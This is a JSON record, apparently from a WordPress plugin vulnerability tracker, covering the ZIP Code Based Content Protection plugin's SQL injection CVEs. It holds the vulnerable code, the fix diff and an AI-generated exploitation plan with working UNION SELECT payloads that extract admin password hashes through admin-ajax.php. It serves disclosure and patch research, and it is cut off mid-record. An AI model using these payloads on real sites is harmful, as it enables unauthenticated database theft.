[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fe3wb7dxI75RsZYa0F44KaetYpIPEThdaHIL2F3OGTsk":3,"$fJhH1b-NLRLatUovptEhI1lVvoeaYn54TmIwcPd0_FYo":510,"$fptDGSRRVinXQ43BwEb-vEuoB-m11d9ocAOnCbfzMuAk":514},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":21,"download_link":22,"security_score":23,"vuln_count":24,"unpatched_count":13,"last_vuln_date":25,"fetched_at":26,"discovery_status":27,"vulnerabilities":28,"developer":80,"crawl_stats":34,"alternatives":88,"analysis":192,"fingerprints":489},"zip-code-based-content-protection","ZIP Code Based Content Protection","1.0.3","PressTigers","https:\u002F\u002Fprofiles.wordpress.org\u002Fpresstigers\u002F","\u003Cp>ZIP Code Based Content Protection comes in handy when you want the visitor to input ZIP Code before showing them any kind of content. 
And the content will be shown if that certain ZIP Code is allowed for that particular content.\u003C\u002Fp>\n\u003Cp>Situations like when you want to show details of a community meeting, promotions and offers on a certain service, event details etc or any kind of content which the admin wants the user to go through by entering the allowed ZIP Code, ZBCP can assist.\u003C\u002Fp>\n\u003Cp>Below are some salient features:\u003C\u002Fp>\n\u003Ch3>ZBCP Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Simple to use\u003C\u002Fli>\n\u003Cli>100% responsive\u003C\u002Fli>\n\u003Cli>Can be enabled on all available post types\u003C\u002Fli>\n\u003Cli>Custom message settings\u003C\u002Fli>\n\u003Cli>Can track most requested ZIP Codes\u003C\u002Fli>\n\u003Cli>Custom ZIP Codes\u003C\u002Fli>\n\u003Cli>Track visitor email addresses\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>As we continue to strive for perfection further features will be added in future updates.\u003C\u002Fp>\n\u003Ch4>DO YOU WANT TO CONTRIBUTE?\u003C\u002Fh4>\n\u003Cp>If you have ideas that can help us improve our plugin and user experience, please contact us at support@presstigers.com\u003C\u002Fp>\n","ZIP Code Based Content Protection comes in handy when you want the visitor to input ZIP Code before showing them any kind of content.",10,3514,0,"2026-02-19T10:41:00.000Z","6.9.4","6.0","7.4",[19,20,4],"content-limitations","private-content","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fzipcode-based-content-protection","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzip-code-based-content-protection.1.0.3.zip",96,2,"2026-03-06 
11:52:34","2026-04-16T10:56:18.058Z","no_bundle",[29,64],{"id":30,"url_slug":31,"title":32,"description":33,"plugin_slug":4,"theme_slug":34,"affected_versions":35,"patched_in_version":6,"severity":36,"cvss_score":37,"cvss_vector":38,"vuln_type":39,"published_date":25,"updated_date":40,"references":41,"days_to_patch":43,"patch_diff_files":44,"patch_trac_url":34,"research_status":53,"research_verified":54,"research_rounds_completed":55,"research_plan":56,"research_summary":57,"research_vulnerable_code":58,"research_fix_diff":59,"research_exploit_outline":60,"research_model_used":61,"research_started_at":62,"research_completed_at":63,"research_error":34,"poc_status":34,"poc_video_id":34,"poc_summary":34,"poc_steps":34,"poc_tested_at":34,"poc_wp_version":34,"poc_php_version":34,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":54,"poc_model_used":34,"poc_verification_depth":34},"CVE-2025-14353","zip-code-based-content-protection-unauthenticated-sql-injection-via-zipcode-parameter","ZIP Code Based Content Protection \u003C= 1.0.2 - Unauthenticated SQL Injection via 'zipcode' Parameter","The ZIP Code Based Content Protection plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 via the 'zipcode' parameter. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=1.0.2","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-07 01:21:22",[42],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8aeaba0e-0a23-48f6-aa42-7f2f3bd741f1?source=api-prod",1,[45,46,47,48,49,50,51,52],"README.txt","admin\u002Fclass-zipcode-bcp-admin.php","admin\u002Fjs\u002Fzipcode-bcp-admin.js","admin\u002Flists\u002Fclass-zipcode-bcp-admin-requested-zipcodes.php","admin\u002Flists\u002Fclass-zipcode-bcp-admin-user-requested-zipcodes.php","admin\u002Flists\u002Fclass-zipcode-bcp-admin-zipcodes-list.php","admin\u002Fmetas\u002Fclass-zipcode-bcp-admin-post-page-meta.php","admin\u002Fsettings\u002Fclass-zipcode-bcp-admin-settings.php","researched",false,3,"This research plan focuses on exploiting a SQL injection vulnerability in the **ZIP Code Based Content Protection** plugin for WordPress.\n\n## 1. Vulnerability Summary\nThe vulnerability is an unauthenticated SQL injection in the `zip_code` parameter handled by the `Zipcode_BCP_Admin` class. The flaw exists in multiple AJAX handlers (`export_registered_users_in_zipcode`, `preview_registered_users_in_zipcode`, and `view_posts_registered_users_in_zipcode`). \n\nThe code uses `sanitize_text_field()` on the input, which does not escape single quotes, and then interpolates the variable directly into a query string. Critically, it then calls `$wpdb->prepare()` on the *already-interpolated* query string while passing an empty string as the second argument. This fails to provide any parameterization for the user input, allowing an attacker to break out of the string literal and append arbitrary SQL.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `export_registered_users_in_zipcode` (and variants)\n- **HTTP Parameter**: `zip_code` (via `$_REQUEST`)\n- **Authentication**: Unauthenticated (as per CVE description; the plugin hooks these actions to `wp_ajax_nopriv_*` to allow unauthenticated users to export\u002Fpreview data if they have requested zip codes).\n- **Vulnerability Type**: UNION-Based SQL Injection.\n\n## 3. Code Flow\n1.  **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=export_registered_users_in_zipcode`.\n2.  **Dispatch**: WordPress triggers the hook `wp_ajax_nopriv_export_registered_users_in_zipcode`, which calls `Zipcode_BCP_Admin::zbcp_export_registered_users_in_zipcode()`.\n3.  **Vulnerable Function** (`admin\u002Fclass-zipcode-bcp-admin.php`):\n    -   `$zipcode = sanitize_text_field( $_REQUEST['zip_code'] );` (Input is retrieved but not SQL-escaped).\n    -   `$pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";` (Input interpolated into query).\n4.  **SQL Sink**: \n    -   `$users = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );`\n    -   The `prepare` call does nothing because the query is already built and the argument is empty.\n5.  **Output**: The results are iterated, and the `user_email` field is echoed:\n    ```php\n    echo \"email\\n\";\n    foreach ( $users as $user ) :\n        echo esc_attr($user['user_email']) . \"\\n\";\n    endforeach;\n    ```\n\n## 4. Nonce Acquisition Strategy\nBased on the analysis of `admin\u002Fjs\u002Fzipcode-bcp-admin.js` and `admin\u002Fclass-zipcode-bcp-admin.php`:\n- **No Nonce Required**: The AJAX requests in `zipcode-bcp-admin.js` for these specific actions (`export_registered_users_in_zipcode`, etc.) 
do not include any security tokens or nonces in the `data` object.\n- **Missing Server-Side Check**: The PHP handlers in `class-zipcode-bcp-admin.php` do not call `check_ajax_referer()` or `wp_verify_nonce()`.\n\nTherefore, the exploit can be executed directly without any prior nonce acquisition.\n\n## 5. Exploitation Strategy\nWe will use a UNION SELECT payload to extract the database name and the admin user's password hash.\n\n### Step 1: Identify Column Count\nThe table `{$wpdb->prefix}zipcode_requested_users` contains 6 columns (verified from `admin\u002Flists\u002Fclass-zipcode-bcp-admin-user-requested-zipcodes.php`):\n1. `id`\n2. `zipcode`\n3. `user_email` (Reflected in `export_registered_users_in_zipcode`)\n4. `post_id`\n5. `post_type`\n6. `post_title`\n\n### Step 2: Extract Data via `export_registered_users_in_zipcode`\nWe will target the 3rd column (`user_email`) because it is enqueued in the output loop.\n\n**HTTP Request:**\n- **URL**: `{{target_url}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: \n  ```text\n  action=export_registered_users_in_zipcode&zip_code=1' UNION SELECT 1,2,CONCAT(0x5b53514c495d,DATABASE(),0x3a,user_login,0x3a,user_pass,0x5b53514c495d),4,5,6 FROM wp_users-- -\n  ```\n  *(Note: `0x5b53514c495d` is the hex for `[SQLI]` to make parsing easy).*\n\n## 6. Test Data Setup\n1.  **Plugin Activation**: Ensure the plugin \"ZIP Code Based Content Protection\" is installed and activated.\n2.  **Table Creation**: The plugin must have created its tables. This usually happens on activation.\n3.  **Administrator**: Ensure at least one administrator exists in `wp_users` (standard for any WP install).\n\n## 7. Expected Results\nThe response should be a text\u002Fcsv-like output:\n```text\nemail\n[SQLI]wordpress_db:admin:$P$B...[SQLI]\n```\nThe presence of the database name and hash confirms successful extraction.\n\n## 8. Verification Steps\n1.  
**Database Check**: Use `wp db query \"SELECT user_pass FROM wp_users WHERE user_login='admin'\"` via WP-CLI to compare the hash retrieved via the exploit.\n2.  **Table Check**: Verify the table exists: `wp db query \"SHOW TABLES LIKE '%zipcode_requested_users%'\"`.\n\n## 9. Alternative Approaches\nIf `export_registered_users_in_zipcode` fails to produce output due to character encoding in the CSV flow, use the JSON-based endpoint:\n\n**Alternative Action**: `preview_registered_users_in_zipcode`\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body**: `action=preview_registered_users_in_zipcode&zip_code=1' UNION SELECT 1,2,DATABASE(),4,5,6-- -`\n- **Response**: A JSON object where `result` contains the extracted data inside `\u003Cp>` tags:\n  ```json\n  {\"status\":true,\"result\":\"\u003Cp>database_name\u003C\\\u002Fp>\\n\"}\n  ```\n\nIf `sanitize_text_field` interferes with complex payloads (like subqueries), use hex encoding for strings to avoid quotes entirely.","The ZIP Code Based Content Protection plugin for WordPress is vulnerable to unauthenticated UNION-based SQL injection via the 'zip_code' parameter in several AJAX actions. This occurs because user input is interpolated directly into SQL query strings before being passed to a non-functional $wpdb->prepare() call, allowing attackers to extract sensitive data from the database.","\u002F\u002F admin\u002Fclass-zipcode-bcp-admin.php:118\npublic function zbcp_export_registered_users_in_zipcode() {\n    if ( ! empty( $_REQUEST['zip_code'] ) ) {\n\n        global $wpdb;\n        $table   = $wpdb->get_blog_prefix() . 'zipcode_requested_users';\n        $zipcode = sanitize_text_field( $_REQUEST['zip_code'] );\n\n        $pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";\n        $users    = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );\n\n---\n\n\u002F\u002F admin\u002Fclass-zipcode-bcp-admin.php:133\nfunction zbcp_preview_registered_users_in_zipcode() {\n    if ( ! 
empty( $_REQUEST['zip_code'] ) ) {\n        global $wpdb;\n        $table   = $wpdb->get_blog_prefix() . 'zipcode_requested_users';\n        $zipcode = sanitize_text_field( $_REQUEST['zip_code'] );\n\n        $pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";\n        $users    = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fzip-code-based-content-protection\u002F1.0.1\u002Fadmin\u002Fclass-zipcode-bcp-admin.php\t2025-09-09 12:59:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fzip-code-based-content-protection\u002F1.0.3\u002Fadmin\u002Fclass-zipcode-bcp-admin.php\t2026-02-19 10:41:48.000000000 +0000\n@@ -113,29 +88,56 @@\n \t\tif ( ! empty( $_REQUEST['zip_code'] ) ) {\n \n \t\t\tglobal $wpdb;\n-\t\t\t$table   = $wpdb->get_blog_prefix() . 'zipcode_requested_users';\n-\t\t\t$zipcode = sanitize_text_field( $_REQUEST['zip_code'] );\n+\t\t\t$table = $wpdb->prefix . 'zipcode_requested_users';\n+\n+\t\t\t\u002F\u002F Get and sanitize ZIP code.\n+\t\t\t$zipcode = sanitize_text_field( wp_unslash( $_REQUEST['zip_code'] ) );\n \n-\t\t\t$pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";\n-\t\t\t$users    = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );\n+\t\t\tif ( empty( $zipcode ) ) {\n+\t\t\t\texit();\n+\t\t\t}\n \n+\t\t\t\u002F\u002F Prepare query safely.\n+\t\t\t$query = $wpdb->prepare(\n+\t\t\t\t\"SELECT user_email FROM {$table} WHERE zipcode = %s\",\n+\t\t\t\t$zipcode\n+\t\t\t);\n+\n+\t\t\t\u002F\u002F Fetch results.\n+\t\t\t$users = $wpdb->get_results( $query, ARRAY_A );","The exploit targets unauthenticated AJAX handlers like 'export_registered_users_in_zipcode' or 'preview_registered_users_in_zipcode'. 
An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to one of the vulnerable hooks and a 'zip_code' parameter containing a SQL payload. Because sanitize_text_field() does not escape single quotes and the query string is pre-interpolated before being passed to $wpdb->prepare() with an empty argument, an attacker can use a UNION SELECT statement to jump out of the 'zipcode' string literal. By determining the column count of the target table, the attacker can reflect results (such as admin password hashes or the database name) directly into the response, which is returned either as plain text\u002FCSV or JSON depending on the action hit.","gemini-3-flash-preview","2026-04-18 05:35:36","2026-04-18 05:36:02",{"id":65,"url_slug":66,"title":67,"description":68,"plugin_slug":4,"theme_slug":34,"affected_versions":69,"patched_in_version":70,"severity":71,"cvss_score":72,"cvss_vector":73,"vuln_type":39,"published_date":74,"updated_date":75,"references":76,"days_to_patch":78,"patch_diff_files":79,"patch_trac_url":34,"research_status":34,"research_verified":54,"research_rounds_completed":13,"research_plan":34,"research_summary":34,"research_vulnerable_code":34,"research_fix_diff":34,"research_exploit_outline":34,"research_model_used":34,"research_started_at":34,"research_completed_at":34,"research_error":34,"poc_status":34,"poc_video_id":34,"poc_summary":34,"poc_steps":34,"poc_tested_at":34,"poc_wp_version":34,"poc_php_version":34,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":54,"poc_model_used":34,"poc_verification_depth":34},"CVE-2025-59008","zip-code-based-content-protection-authenticated-administrator-sql-injection","ZIP Code Based Content Protection \u003C= 1.0.0 - Authenticated (Administrator+) SQL Injection","The ZIP Code Based Content Protection plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and 
lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=1.0.0","1.0.1","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","2025-09-08 00:00:00","2025-09-16 14:57:24",[77],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F890aeff2-47f2-4377-879e-2254d45312dd?source=api-prod",9,[],{"slug":81,"display_name":7,"profile_url":8,"plugin_count":82,"total_installs":83,"avg_security_score":84,"avg_patch_time_days":85,"trust_score":86,"computed_at":87},"presstigers",12,32330,84,317,68,"2026-05-19T15:16:12.795Z",[89,111,134,153,173],{"slug":90,"name":91,"version":92,"author":93,"author_profile":94,"description":95,"short_description":96,"active_installs":97,"downloaded":98,"rating":99,"num_ratings":100,"last_updated":101,"tested_up_to":15,"requires_at_least":102,"requires_php":103,"tags":104,"homepage":108,"download_link":109,"security_score":23,"vuln_count":55,"unpatched_count":13,"last_vuln_date":110,"fetched_at":26},"client-portal","Client Portal – Private user pages and login","1.2.2","madalin.ungureanu","https:\u002F\u002Fprofiles.wordpress.org\u002Fmadalinungureanu\u002F","\u003Cp>The \u003Ca href=\"https:\u002F\u002Fwww.cozmoslabs.com\u002Fadd-ons\u002Fclient-portal\u002F\" rel=\"nofollow ugc\">WordPress Client Portal plugin\u003C\u002Fa> creates private pages for each user. 
The content for that page is accessible  on the frontend only by the owner of the page\u003Cbr \u002F>\nafter he has logged in.\u003C\u002Fp>\n\u003Cp>The plugin doesn’t offer a login or registration form and it gives you the possibility to use a plugin of your choice.\u003C\u002Fp>\n\u003Cp>The \u003Cstrong>[client-portal]\u003C\u002Fstrong> shortcode can be added to any page and when the logged in user will access that page he will be redirected to its private page.\u003C\u002Fp>\n\u003Cp>For login and registration of users we recommend the free \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fprofile-builder\u002F\" rel=\"ugc\">Profile Builder\u003C\u002Fa> plugin.\u003C\u002Fp>\n\u003Cp>You can then use the [wppb-login] shortcode in the same page as the [client-portal] shortcode.\u003C\u002Fp>\n","WordPress Client Portal Plugin that creates private pages for all users that only an administrator can edit.",3000,145271,86,23,"2026-01-22T09:22:00.000Z","3.1","",[90,105,20,106,107],"private-client-page","private-pages","private-user-page","http:\u002F\u002Fwww.cozmoslabs.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclient-portal.1.2.2.zip","2026-01-16 00:00:00",{"slug":112,"name":113,"version":114,"author":115,"author_profile":116,"description":117,"short_description":118,"active_installs":119,"downloaded":120,"rating":121,"num_ratings":122,"last_updated":123,"tested_up_to":124,"requires_at_least":125,"requires_php":103,"tags":126,"homepage":131,"download_link":132,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"lh-private-content-login","LH Private Content Login","1.05","shawfactor","https:\u002F\u002Fprofiles.wordpress.org\u002Fshawfactor\u002F","\u003Cp>Do you post private content? 
Are you sending those links to your users with private content access?\u003C\u002Fp>\n\u003Cp>WordPress natively send non-logged in users to a 404 (content not found) page when they try to access a post, page, or cpt without rights. This plugin redirects those users to the login page. After successful login the user is then redirected back to the post, page, or cpt they were trying to access.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Like this plugin? Please consider \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fview\u002Fplugin-reviews\u002Flh-private-content-login\u002F\" rel=\"ugc\">leaving a 5-star review\u003C\u002Fa>.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Love this plugin or want to help the LocalHero Project? Please consider \u003Ca href=\"https:\u002F\u002Flhero.org\u002Fportfolio\u002Flh-private-content-login\u002F\" rel=\"nofollow ugc\">making a donation\u003C\u002Fa>.\u003C\u002Fstrong>\u003C\u002Fp>\n","Redirects non-logged users to the login page when they follow a link to a post, page, or cpt which is protected by post status.",300,5908,100,5,"2024-02-28T04:08:00.000Z","6.4.8","5.0",[127,128,20,129,130],"login","post-status","redirection","status","https:\u002F\u002Flhero.org\u002Fportfolio\u002Flh-private-content-login\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flh-private-content-login.zip",85,{"slug":135,"name":136,"version":137,"author":138,"author_profile":139,"description":140,"short_description":141,"active_installs":142,"downloaded":143,"rating":121,"num_ratings":55,"last_updated":144,"tested_up_to":145,"requires_at_least":146,"requires_php":103,"tags":147,"homepage":151,"download_link":152,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"private-file-for-woocommerce","Private File for Woocommerce","1.0.4","Roberto Bottalico","https:\u002F\u002Fprofiles.wordpress.org\u002F4wpbari\u002F","\u003Cp>Consente di poter inviare ai tuoi clienti file 
privati, pagine private ed una pagina condivisa, nella sezione my account di woocommerce nell’area clienti\u003C\u002Fp>\n\u003Ch3>Descrizione\u003C\u002Fh3>\n\u003Cp>Private File For Woocommerce è un semplice ma utilissimo plugin che permette di poter allegare file in modo totalmente privato direttamente al singolo cliente, che lo potrà scaricare\u003Cbr \u002F>\nnella sezione privato nell’account di woocommerce.\u003C\u002Fp>\n\u003Ch4>Che cosa permette di fare?\u003C\u002Fh4>\n\u003Cp>Il plugin è un fork del cuore principale di \u003Ca href=\"https:\u002F\u002Fit.wordpress.org\u002Fplugins\u002Fcustomer-area\u002F\" rel=\"nofollow ugc\">Wp Customer Area\u003C\u002Fa> versione 1.6 -THANKS E CREDIT – assemblato nelle funzionalità di woocommerce.\u003C\u002Fp>\n\u003Cp>Oltre a file privati, permette anche di inserire pagine private per singolo cliente, ed infine permette di poter inserire una sola pagina condivisa con tutti i clienti, sempre nell’area clienti.\u003C\u002Fp>\n\u003Cp>Come funziona il plugin?\u003Cbr \u002F>\nUna volta attivato, di default è impostato per inserire i file. 
Potete attivare in backend con il flag anche le altre sezioni direttamente in PRIVATE FILE FOR WOOCOMMERCE\u002FIMPOSTAZIONI.\u003Cbr \u002F>\nUna volta attivato, in frontend invece verranno inserite due sezioni in my account di woocommerce nell’area riservata del cliente\u003Cbr \u002F>\nSEZ.CONDIVISA=una pagina condivisa con tutti i clienti\u003Cbr \u002F>\nSEZ.PRIVATA=infiniti file privati o pagine private al singolo cliente\u003C\u002Fp>\n\u003Cp>Le sezioni possono essere attivate\u002Fdisattivate singolarmente, in base alle proprie esigenze\u003C\u002Fp>\n\u003Cp>Il plugin funziona su tutti i temi, non avrai problemi di incompatibilità o conflitti.\u003C\u002Fp>\n\u003Cp>Protezione perfetta dei file, nessun direct link per il download neanche se l’utente è loggato e verrebbe a conoscenza del link del file di un altro utente.\u003C\u002Fp>\n\u003Cp>Plugin pratico, intuitivo e leggero.\u003C\u002Fp>\n\u003Cp>Spero che soddisfi le vostre esigenze, buon lavoro a tutti.\u003C\u002Fp>\n\u003Cp>Note:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Il plugin richiede Woocommerce.\u003C\u002Fli>\n\u003Cli>La dimensione dei file singoli da allegare è in base al vostro hosting. 
(media max 20mb)\u003C\u002Fli>\n\u003Cli>Il plugin non permette la cancellazione del file caricato dal pannello, ma cancellabile solo in ftp\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Installazione\u003C\u002Fh3>\n\u003Cp>Puoi caricare il file zip da Plugin\u002FAggiungi Nuovo, dal pannello di amministrazione del tuo wordpress\u003Cbr \u002F>\noppure\u003Cbr \u002F>\nEstrai il file zip e rilascia il contenuto nella directory wp-content \u002F plugins \u002F della tua installazione di WordPress, quindi attiva la pagina Plugin da Plugins.\u003C\u002Fp>\n","Consente di poter inviare ai tuoi clienti file privati, pagine private ed una pagina condivisa, nella sezione my account di woocommerce nell'area &hellip;",80,2516,"2022-02-17T17:27:00.000Z","5.9.13","4.9",[148,20,149,150],"myaccount-woocommerce","private-file","woocommerce","https:\u002F\u002Fwww.4wp.it","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprivate-file-for-woocommerce.zip",{"slug":154,"name":155,"version":156,"author":157,"author_profile":158,"description":159,"short_description":160,"active_installs":11,"downloaded":161,"rating":13,"num_ratings":13,"last_updated":162,"tested_up_to":163,"requires_at_least":164,"requires_php":165,"tags":166,"homepage":171,"download_link":172,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"advision-private-area","Advision Private Area","0.0.2","Marco","https:\u002F\u002Fprofiles.wordpress.org\u002Fmarcopappalardo\u002F","\u003Cp>This simple plugin allow you manage easily your audience like Customers, Sellers, Employers or anyone else.\u003Cbr \u002F>\nYou can share files like documents, bills, notices or other to each person you need. 
They will get a private area where they will find anything you share with them.\u003C\u002Fp>\n\u003Cp>How to use this plugin:\u003Cbr \u002F>\n– Choose the page where you want to display the private area of each customer and just copy and paste this shortcode [adv_reserved_area]\u003Cbr \u002F>\n– Refresh your permalinks\u003Cbr \u002F>\n– After you install the plugin a new user role “Site Manager” will be created. You can assign it to each user who should add new content for your audience.\u003Cbr \u002F>\n– You can also easily manage the role capabilities by other plugins like “User role manager”.\u003Cbr \u002F>\n– All users with subscriber role can have access to their private area.\u003Cbr \u002F>\n– The whole plugin is wpml compatible. This allows you an easy and fast translation into your language.\u003C\u002Fp>\n","Manage private contents for your customers, sellers, employer or everyone you need. Upload documents, notices or other files to your audience.",1355,"2021-01-22T10:39:00.000Z","5.6.17","4.0","4.6",[167,168,169,170,20],"client-area","customer-area","member-area","private-area","http:\u002F\u002Fwww.advisionplus.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvision-private-area.zip",{"slug":174,"name":175,"version":176,"author":177,"author_profile":178,"description":179,"short_description":180,"active_installs":11,"downloaded":181,"rating":121,"num_ratings":43,"last_updated":182,"tested_up_to":183,"requires_at_least":184,"requires_php":103,"tags":185,"homepage":190,"download_link":191,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"content-permissions-for-pages-posts","Content Permissions for Pages & Posts","1.0","param","https:\u002F\u002Fprofiles.wordpress.org\u002Fparamsheoran\u002F","\u003Cblockquote>\n\u003Cp>Control your content based on logged in users, guests roles. 
Hide the content and show a message asking them to log in.\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>Hide complete page content, post content with simple use of shortcode and your content inside this.\u003Cbr \u002F>\n  Special option to display the content only to guests, only to logged in users etc.\u003C\u002Fp>\n\u003Cp>The plugin enables you to value your content and distribute your content based on login or guest.\u003Cbr \u002F>\n  Simple shortcode to use, no code, no development knowledge required.\u003C\u002Fp>\n\u003Ch4>Shortcode list:\u003C\u002Fh4>\n\u003Col>\n\u003Cli>\n\u003Cp>[cpp_guests] Your content to display for guest only. [\u002Fcpp_guests]\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>[cpp_users]  Display content for users\u002Fmembers\u002Flogged in only. [\u002Fcpp_users]\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Fol>\n","Control your content permissions with a simple shortcode. Restrict content access to members, guests or logged-in users.",1398,"2017-11-17T09:48:00.000Z","4.8.28","3.0",[186,187,20,188,189],"content-permissions","members","restrict-content","restrict-guest","https:\u002F\u002Fprofiles.wordpress.org\u002Fparamsheoran","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcontent-permissions-for-pages-posts.zip",{"attackSurface":193,"codeSignals":300,"taintFlows":362,"riskAssessment":472,"analyzedAt":488},{"hooks":194,"ajaxHandlers":267,"restRoutes":297,"shortcodes":298,"cronEvents":299,"entryPointCount":11,"unprotectedCount":11},[195,201,206,210,213,216,219,222,225,227,231,234,236,238,241,244,247,250,252,255,258,261,263],{"type":196,"name":197,"callback":198,"priority":11,"file":199,"line":200},"filter","set-screen-option","set_screen","admin\\lists\\class-zipcode-bcp-admin-requested-zipcodes.php",350,{"type":202,"name":203,"callback":204,"file":199,"line":205},"action","admin_menu","register_menu",351,{"type":202,"name":207,"callback":208,"file":199,"line":209},"plugins_loaded","get_instance",428,{"type":196,"nam
e":197,"callback":198,"priority":11,"file":211,"line":212},"admin\\lists\\class-zipcode-bcp-admin-user-requested-zipcodes.php",339,{"type":202,"name":203,"callback":214,"file":211,"line":215},"zbcp_user_req_lists_menu",340,{"type":202,"name":207,"callback":217,"file":211,"line":218},"closure",410,{"type":196,"name":197,"callback":198,"priority":11,"file":220,"line":221},"admin\\lists\\class-zipcode-bcp-admin-zipcodes-list.php",292,{"type":202,"name":203,"callback":223,"file":220,"line":224},"zbcp_lists_menu",293,{"type":202,"name":207,"callback":217,"file":220,"line":226},449,{"type":202,"name":207,"callback":228,"file":229,"line":230},"anonymous","includes\\class-zipcode-bcp.php",164,{"type":202,"name":232,"callback":228,"file":229,"line":233},"admin_enqueue_scripts",178,{"type":202,"name":232,"callback":228,"file":229,"line":235},179,{"type":202,"name":203,"callback":228,"file":229,"line":237},191,{"type":202,"name":239,"callback":228,"file":229,"line":240},"admin_init",192,{"type":202,"name":242,"callback":228,"file":229,"line":243},"add_meta_boxes",196,{"type":202,"name":245,"callback":228,"file":229,"line":246},"save_post",197,{"type":202,"name":248,"callback":228,"file":229,"line":249},"wp_enqueue_scripts",211,{"type":202,"name":248,"callback":228,"file":229,"line":251},212,{"type":202,"name":253,"callback":228,"file":229,"line":254},"init",217,{"type":196,"name":256,"callback":228,"file":229,"line":257},"query_vars",218,{"type":196,"name":259,"callback":228,"file":229,"line":260},"template_redirect",219,{"type":196,"name":259,"callback":228,"file":229,"line":262},220,{"type":196,"name":264,"callback":217,"file":265,"line":266},"template_include","public\\class-zipcode-bcp-public.php",138,[268,271,274,277,280,283,286,289,292,295],{"action":269,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":270},"export_registered_users_in_zipcode",182,{"action":272,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":273},"pr
